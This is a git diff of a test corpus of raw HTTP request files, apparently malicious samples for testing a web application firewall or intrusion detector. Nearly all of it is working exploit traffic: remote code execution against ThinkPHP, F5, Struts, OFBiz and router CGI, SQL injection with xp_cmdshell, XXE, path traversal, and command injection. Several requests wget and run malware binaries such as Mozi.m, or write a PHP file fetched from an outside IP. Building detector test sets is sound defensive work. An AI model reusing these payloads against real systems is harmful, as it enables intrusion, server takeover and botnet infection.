+Language_S=../../../../windows/win.ini + diff --git a/testcases/c2/14/44c7ca191769289924c18167598b.black b/testcases/c2/14/44c7ca191769289924c18167598b.black index c1fe0b150..8c8d39f76 100644 --- a/testcases/c2/14/44c7ca191769289924c18167598b.black +++ b/testcases/c2/14/44c7ca191769289924c18167598b.black @@ -1,10 +1,13 @@ -GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1 +POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/sqli/?id=SELECT+pg_sleep%2810%29&Submit=Submit Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close + + +&send; + diff --git a/testcases/c7/2a/d05669e002228b0eabd5805187f5.black b/testcases/c7/2a/d05669e002228b0eabd5805187f5.black index 0f7cbd1ce..3b912d002 100644 --- a/testcases/c7/2a/d05669e002228b0eabd5805187f5.black +++ b/testcases/c7/2a/d05669e002228b0eabd5805187f5.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1 +GET /include/thumb.php?dir=http\..\admin\login\login_check.php HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/sqli/?id=%7B%22id%22%3A%22MSBhbmQgMT0y%22%7D&Submit=Submit Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/c7/8a/dcf02bbc575d68ce9ddcd72611b2.black b/testcases/c7/8a/dcf02bbc575d68ce9ddcd72611b2.black index 13a1136be..e20089e63 100644 --- a/testcases/c7/8a/dcf02bbc575d68ce9ddcd72611b2.black +++ b/testcases/c7/8a/dcf02bbc575d68ce9ddcd72611b2.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /nette.micro/?callback=shell_exec&cmd=cd%20/tmp;wget%20http://47.108.71.52/Linux2.6;chmod%20777%20Linux2.6;./Linux2.6 HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=parent%5B%2F*foo*%2F%27alert%27%2F*bar*%2F%5D%28parent%5B%2F*foo*%2F%27document%27%2F*bar*%2F%5D%5B%27domain%27%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/c9/59/ff8a75123ca81c1e02831483bdab.black b/testcases/c9/59/ff8a75123ca81c1e02831483bdab.black index 9de5a1440..9de28878c 100644 --- a/testcases/c9/59/ff8a75123ca81c1e02831483bdab.black +++ b/testcases/c9/59/ff8a75123ca81c1e02831483bdab.black @@ -1,10 +1,11 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +POST /mgmt/tm/util/bash HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3Cbody+background%3D%22%2F%2Fevil%3F+%3Ctable+background%3D%22%2F%2Fevil%3F+%3Ctable%3E%3Cthead+background%3D%22%2F%2Fevil%3F+%3Ctable%3E%3Ctbody+background%3D%22%2F%2Fevil%3F+%3Ctable%3E%3Ctfoot+background%3D%22%2F%2Fevil%3F+%3Ctable%3E%3Ctd+background%3D%22%2F%2Fevil%3F+%3Ctable%3E%3Cth+background%3D%22%2F%2Fevil%3F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close +{"command":"run","utilCmdArgs":"-c id"} + diff --git a/testcases/c9/b7/41d14e7f2e840c72e6b74a2b7f1a.black b/testcases/c9/b7/41d14e7f2e840c72e6b74a2b7f1a.black index 0dedb686e..d86e41e5f 100644 --- a/testcases/c9/b7/41d14e7f2e840c72e6b74a2b7f1a.black +++ b/testcases/c9/b7/41d14e7f2e840c72e6b74a2b7f1a.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /index.php/?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func&vars%5B0%5D=md5&vars%5B1%5D=20220321 HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=top%5B%2Fal%2F.source%2B%2Fert%2F.source%5D%28%2FXSS%2F.source%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/cc/81/555e2ac26325cb395cd679e71594.black b/testcases/cc/81/555e2ac26325cb395cd679e71594.black index df428b1e7..a5bab47ac 100644 --- a/testcases/cc/81/555e2ac26325cb395cd679e71594.black +++ b/testcases/cc/81/555e2ac26325cb395cd679e71594.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /?tag&tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=./data/connn.php&t2=file_get_contents&t3=http://38.59.110.34:1248/01.txt HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=this%5B%27%5C141%5C154%5C145%5C162%5C164%27%5D%28%27%5C130%5C123%5C123%27%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/ce/8e/1107e19a71beb168c4133f415dea.black b/testcases/ce/8e/1107e19a71beb168c4133f415dea.black index 8d9ab29c5..47c99f17f 100644 --- a/testcases/ce/8e/1107e19a71beb168c4133f415dea.black +++ b/testcases/ce/8e/1107e19a71beb168c4133f415dea.black @@ -1,10 +1,11 @@ -GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1 +POST /admin/?a=doExportPack&c=language_general&n=language HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/sqli/?id=s%3A11%3A%22avatar_link%22%3Bs%3A16%3A%22L2V0Yy9wYXNzd2Q%3D%22&Submit=Submit Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close +appno= 1 union SELECT 42894*41146,1&editor=cn&site=web + diff --git a/testcases/d2/85/cf101c15f554a33e1635a814db84.black b/testcases/d2/85/cf101c15f554a33e1635a814db84.black index 836ec98e7..828b6acd2 100644 --- a/testcases/d2/85/cf101c15f554a33e1635a814db84.black +++ b/testcases/d2/85/cf101c15f554a33e1635a814db84.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /?id=1%27+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)--+&rest_route=/h5vp/v1/view/1 HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=self%5B%27%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%27%5D%28self%5B%27%5Cx64%5Cx6f%5Cx63%5Cx75%5Cx6d%5Cx65%5Cx6e%5Cx74%27%5D%5B%27%5Cx64%5Cx6f%5Cx6d%5Cx61%5Cx69%5Cx6e%27%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/d4/93/c08070006641036baa5c38cf3d42.black b/testcases/d4/93/c08070006641036baa5c38cf3d42.black index 001dd5b41..7b1029ace 100644 --- a/testcases/d4/93/c08070006641036baa5c38cf3d42.black +++ b/testcases/d4/93/c08070006641036baa5c38cf3d42.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /?doAs=%60ping%20acs.nhz4e6ts.xaliyun.com%60 HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3C%21DOCTYPE+foo+%5B+%3C%21ENTITY+ext+SYSTEM+%22file%3A%2F%2F%2Fpath%2Fto%2Ffile%22+%3E+%5D%3E Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/d5/cd/8b5a4e82f781e18c753abaceb807.black b/testcases/d5/cd/8b5a4e82f781e18c753abaceb807.black index 1439021c2..7f19f07d9 100644 --- a/testcases/d5/cd/8b5a4e82f781e18c753abaceb807.black +++ b/testcases/d5/cd/8b5a4e82f781e18c753abaceb807.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=top%5B%27ale%27%2B%27rt%27%5D%28top%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/d6/36/4f7fd442d0ded1ed975c5131a5a7.black b/testcases/d6/36/4f7fd442d0ded1ed975c5131a5a7.black index 40d644afc..57f6e8512 100644 --- a/testcases/d6/36/4f7fd442d0ded1ed975c5131a5a7.black +++ b/testcases/d6/36/4f7fd442d0ded1ed975c5131a5a7.black @@ -1,4 +1,4 @@ -GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1 +POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.) HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 @@ -8,3 +8,5 @@ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close +username=root&password=toor&commit=Login + diff --git a/testcases/de/16/8f5208d44b701dd9e7e7b5245d08.black b/testcases/de/16/8f5208d44b701dd9e7e7b5245d08.black index 29525a257..327066e6f 100644 --- a/testcases/de/16/8f5208d44b701dd9e7e7b5245d08.black +++ b/testcases/de/16/8f5208d44b701dd9e7e7b5245d08.black @@ -1,4 +1,4 @@ -GET /dvwa/js/dvwaPage.js HTTP/1.1 +POST /mapptopo HTTP/1.1 Host: 10.10.3.128 Pragma: no-cache Cache-Control: no-cache @@ -9,3 +9,5 @@ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close +{"AppId": "aaaa'|curl acs.azlvnac6.xaliyun.com|'", "Time": "2020/1/1 1:1:1"} + diff --git a/testcases/df/ee/163c88d58870c7ff1e4a5377d17c.black b/testcases/df/ee/163c88d58870c7ff1e4a5377d17c.black index 4a91f4599..87bba31fd 100644 --- a/testcases/df/ee/163c88d58870c7ff1e4a5377d17c.black +++ b/testcases/df/ee/163c88d58870c7ff1e4a5377d17c.black @@ -1,10 +1,27 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +POST /webtools/control/SOAPService HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=window%5B%2F*foo*%2F%27alert%27%2F*bar*%2F%5D%28window%5B%2F*foo*%2F%27document%27%2F*bar*%2F%5D%5B%27domain%27%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close + + + + + + + +aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff74000071007e000571007e0005740004687474707078740007687474703a2f2f78 + + + + + + + + + + diff --git a/testcases/eb/ce/f6c680a75859b4b51e819652ff23.black b/testcases/eb/ce/f6c680a75859b4b51e819652ff23.black index d2660a353..d65d62edf 100644 --- a/testcases/eb/ce/f6c680a75859b4b51e819652ff23.black +++ b/testcases/eb/ce/f6c680a75859b4b51e819652ff23.black @@ -1,10 +1,28 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +POST /webtools/control/xmlrpc;/?PASSWORD=s&USERNAME&requirePasswordChange=Y HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=frames%5B%27ale%27%2B%27rt%27%5D%28frames%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close + + +RCE + + + + + +RCE + +rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAAHEAfgAFcQB+AAV0AARodHRwcHh0AAdodHRwOi8veA== + + + + + + + + diff --git a/testcases/ec/98/75af1332f120a05581069320ad6f.black b/testcases/ec/98/75af1332f120a05581069320ad6f.black index 65dd18e4e..ae18aab67 100644 --- a/testcases/ec/98/75af1332f120a05581069320ad6f.black +++ b/testcases/ec/98/75af1332f120a05581069320ad6f.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /abcdefg/hijklmn/a.html?1%20AND%201=1%20UNION%20ALL%20SELECT%201,NULL,%27%27,table_name%20FROM%20information_schema.tables%20WHERE%202>1--/**/;%20EXEC%20xp_cmdshell(%27cat%20../../../etc/passwd%27) HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%7By%3A%27%27.constructor.prototype%7D.y.charAt%3D%5B%5D.join%3B%5B1%5D%7CorderBy%3A%27x%3Dalert%281%29%27 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/f1/e6/04a2a6bd968eeccacc3492bb9a54.black b/testcases/f1/e6/04a2a6bd968eeccacc3492bb9a54.black index 8717f6214..9c6af1182 100644 --- a/testcases/f1/e6/04a2a6bd968eeccacc3492bb9a54.black +++ b/testcases/f1/e6/04a2a6bd968eeccacc3492bb9a54.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /?nice%20?%3Cscript%3Ealert(11)%3C/script%3E%20%2C%20%20/true=123.txt HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3C%21DOCTYPE+foo+%5B%3C%21ENTITY+%25+xxe+SYSTEM+%22YOUR-DTD-URL%22%3E+%25xxe%3B%5D%3E Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/f3/e3/c018d16aaaaec1aa81063599de7d.black b/testcases/f3/e3/c018d16aaaaec1aa81063599de7d.black index 41b3c8bd8..5d38d0567 100644 --- a/testcases/f3/e3/c018d16aaaaec1aa81063599de7d.black +++ b/testcases/f3/e3/c018d16aaaaec1aa81063599de7d.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/sqli/ HTTP/1.1 +GET /?nice%20?%3Cimg%20src=%22x%22%20onerror=%22document.location=`http://www%E3%80%82baidu%E3%80%82com`%22%3E%20%2C%20%20/true=123.txt HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3C%21DOCTYPE+message+%5B+%3C%21ENTITY+%25+local_dtd+SYSTEM+%22file%3A%2F%2F%2Fusr%2Fshare%2Fyelp%2Fdtd%2Fdocbookx.dtd%22%3E+%3C%21ENTITY+%25+ISOamso+%27+%3C%21ENTITY+%26%23x25%3B+file+SYSTEM+%22file%3A%2F%2F%2Fetc%2Fhostname%22%3E+%3C%21ENTITY+%26%23x25%3B+eval+%22%3C%21ENTITY+%26%23x26%3B%23x25%3B+error+SYSTEM+%26%23x27%3Bfile%3A%2F%2F%2Fnonexistent%2F%26%23x25%3Bfile%3B%26%23x27%3B%3E%22%3E+%26%23x25%3Beval%3B+%26%23x25%3Berror%3B+%27%3E+%25local_dtd%3B+%5D%3E Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/f5/c3/a3430806d58e7326c185844478cb.black b/testcases/f5/c3/a3430806d58e7326c185844478cb.black index 6bbc10d5c..fef60b48d 100644 --- a/testcases/f5/c3/a3430806d58e7326c185844478cb.black +++ b/testcases/f5/c3/a3430806d58e7326c185844478cb.black @@ -1,10 +1,11 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +POST /check/list.json HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=toString.constructor.prototype.toString%3DtoString.constructor.prototype.call%3B%5B%22a%22%2C%22alert%281%29%22%5D.sort%28toString.constructor%29 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close +{"order":"DESC","orderBy":"boot_time","page":"1","pageSize":20,"state":"extractvalue(1,concat(char(126),version()))"} + diff --git a/testcases/f7/13/972839f8fc8f52d10dccf5810a37.black b/testcases/f7/13/972839f8fc8f52d10dccf5810a37.black index c4166a051..466baebb5 100644 --- a/testcases/f7/13/972839f8fc8f52d10dccf5810a37.black +++ b/testcases/f7/13/972839f8fc8f52d10dccf5810a37.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /?doAs=%60ping%20acs.14z6oc22.xaliyun.com%60 HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=self%5B%27ale%27%2B%27rt%27%5D%28self%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/f8/a4/02ab54e5f09988c77ecb2226ca26.black b/testcases/f8/a4/02ab54e5f09988c77ecb2226ca26.black index e64514c78..ff92eb091 100644 --- a/testcases/f8/a4/02ab54e5f09988c77ecb2226ca26.black +++ b/testcases/f8/a4/02ab54e5f09988c77ecb2226ca26.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1 +GET /id/1/text/2%20and%202=2 HTTP/1.0 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/sqli/?id=1&Submit=Submit Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/fb/cf/9af1737e5cef4ea8386f6b983812.black b/testcases/fb/cf/9af1737e5cef4ea8386f6b983812.black index 5a7d8dde7..63a16c346 100644 --- a/testcases/fb/cf/9af1737e5cef4ea8386f6b983812.black +++ b/testcases/fb/cf/9af1737e5cef4ea8386f6b983812.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /plugins/servlet/gadgets/makeRequest?url=https://47.104.188.110:7888@acs.qcz84ien.xaliyun.com HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=self%5B%2F*foo*%2F%27alert%27%2F*bar*%2F%5D%28self%5B%2F*foo*%2F%27document%27%2F*bar*%2F%5D%5B%27domain%27%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/fd/1d/a479fb9451e9a1823d4a60822908.black b/testcases/fd/1d/a479fb9451e9a1823d4a60822908.black index cbf806198..708f2e541 100644 --- a/testcases/fd/1d/a479fb9451e9a1823d4a60822908.black +++ b/testcases/fd/1d/a479fb9451e9a1823d4a60822908.black @@ -1,10 +1,10 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +POST /dataSetParam/verification;swagger-ui/ HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=frames%5B%27%5C141%5C154%5C145%5C162%5C164%27%5D%28%27%5C130%5C123%5C123%27%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close +{"sampleItem": "1", "validationRules": "function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"} diff --git a/testcases/ff/67/62b331a3e94507a5759d1f9bcb8a.black b/testcases/ff/67/62b331a3e94507a5759d1f9bcb8a.black index fd6edfba5..2ea0d7322 100644 --- a/testcases/ff/67/62b331a3e94507a5759d1f9bcb8a.black +++ b/testcases/ff/67/62b331a3e94507a5759d1f9bcb8a.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET index.action?redirect:${#a=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#b=#a.getRealPath("/"),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#b),#matt.getWriter().flush(),#matt.getWriter().close()} HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: 